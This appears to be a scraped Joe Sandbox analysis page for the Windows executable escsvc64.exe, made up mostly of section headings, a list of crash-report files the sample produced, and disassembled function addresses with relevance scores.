Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report escsvc64.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_escsvc64.exe_53d1627f168be861b92b51d2acfa94936fb4840_2aa0144e_e52d448c-5098-4d51-9085-3b96801b7a62\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC59B.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC696.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC6C6.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
escsvc64.exe

Function 00000001400032A0 Relevance: 12.2, APIs: 8, Instructions: 163
memoryCOMMON

Function 0000000140007450 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 133
memoryCOMMON

Function 0000000180001C10 Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Function 0000000140006450 Relevance: 10.6, APIs: 7, Instructions: 65
memorythreadCOMMON

Function 0000000140007170 Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Function 0000000140008800 Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Function 0000000140007610 Relevance: 2.6, APIs: 2, Instructions: 69
memoryCOMMON

Function 000000018000BBC0 Relevance: 1.5, APIs: 1, Instructions: 16
memoryCOMMON

Function 00000001400076B0 Relevance: 1.3, APIs: 1, Instructions: 26
COMMON

Function 0000000140001C90 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 233
registrystringCOMMON

Function 0000000140008E50 Relevance: 29.0, APIs: 19, Instructions: 515
COMMON

Function 0000000140002090 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 144
stringCOMMON

Function 000000014000CF60 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152
libraryloaderCOMMON